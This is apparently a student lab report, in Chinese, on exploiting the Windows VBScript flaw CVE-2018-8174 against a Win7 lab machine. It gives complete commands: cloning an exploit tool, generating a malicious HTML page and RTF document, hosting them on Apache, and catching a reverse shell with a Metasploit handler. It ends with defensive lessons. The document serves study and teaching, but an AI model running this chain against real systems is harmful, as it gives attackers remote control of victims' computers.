一、该漏洞的相关背景
CVE-2018-8174是 Windows VBScript Engine 代码执行漏洞。由于VBScript脚本执行引擎存在代码执行漏洞,攻击者可以将恶意的VBScript嵌入到Office文件或者网站中,一旦用户不小心点击,远程攻击者可以获取当前用户权限执行脚本中的恶意代码,该漏洞影响最新版本的IE浏览器及使用了IE内核的应用程序。用户在浏览网页或打开Office文档时都可能中招,最终被黑客植入后门木马完全控制电脑。在基于Web的攻击情形中,攻击者能通过Internet Explorer利用此漏洞的特定网站,然后诱使用户查看该网站。攻击者还可以在承载IE呈现引擎的应用程序或Microsoft Office文档中嵌入标记为“安全初始化”的ActiveX控件。攻击者还可以利用受到破坏的网站和接受或托管用户提供的内容或广告的网站。这些网站可能包含可能利用此漏洞的特制内容。
二、漏洞触发的核心背景原因
在当时的Win生态中,VBScript被广泛应用于网页脚本解析与部分企业环境中,而当时IE浏览器作为系统默认组件,其所带脚本引擎具有较高权限,一旦被利用,攻击者可在当前用户权限下执行任意代码。
三、漏洞影响的范围
CVE-2018-8174影响范围较广,主要存在于以下系统版本:
1.Windows7 / 8.1 10以及Windows Server系列
2.使用IE内核应用程序
在未打补丁的系统中,用户仅仅访问恶意页面即可触发漏洞,并无需额外交互。
四、实验过程(建议提前关闭靶机的防火墙)
利用CVE-2018-8174漏洞获取靶机权限
准备:kali攻击机、win7靶机(实验开始前确保双机可以ping通)
1.获取攻击所用的EXP
方法一:直接进行git
git clone https://github.com/iBearcat/CVE-2018-8174_EXP.git
方法二:下载到本地进行解压再复制到kali(适用于kali无法进行git的情况)
cd CVE-2018-8174_EXP-master
cd /home/kali/Desktop/CVE-2018-8174_EXP-master/
2.生成恶意html与rtf文件
这里需要注意:该漏洞利用工具明确要求Python 2.x环境运行,使用Python 3.x会触发语法错误”这是一个关键点,明确利用工具的运行环境。否则会报错,如下:
正确的运行语句:
python2 CVE-2018-8174.py -u http://192.168.142.133/exploit.html -o exploit.rtf -i 192.168.142.133 -p 4444(IP地址为自己kali攻击机的地址)
3.将恶意html文件移动到网站根目录,并启动apach2服务
cp exploit.html /var/www/html
service apache2 start
新打开一个终端,生成MSF监听
msfconsole -x "use exploit/multi/handler;
set PAYLOAD Windows/shell/reverse_tcp;
set LHOST 192.168.142.133; set lport 4444;
run
在靶机win7上打开恶意链接:http://192.168.142.133/exploit.html
此时在kali接收到shell,可在meterpreter中管理shell(但非管理员权限)
4.至此结束初级权限渗透,后续进一步权限提升可结合其他手段
五、总结
通过本次实验,提升了我对漏洞利用流程(信息收集、利用构造、权限获取)的整体理解,也加深了对安全防护重要性的认识,例如及时更新补丁、禁用不必要组件(如VBScript)以及提高用户安全意识等。整体而言,本实验有效增强了我的实践能力和对Web与系统安全的综合理解也让我认识到真实攻击往往是“漏洞链”而非单一漏洞。
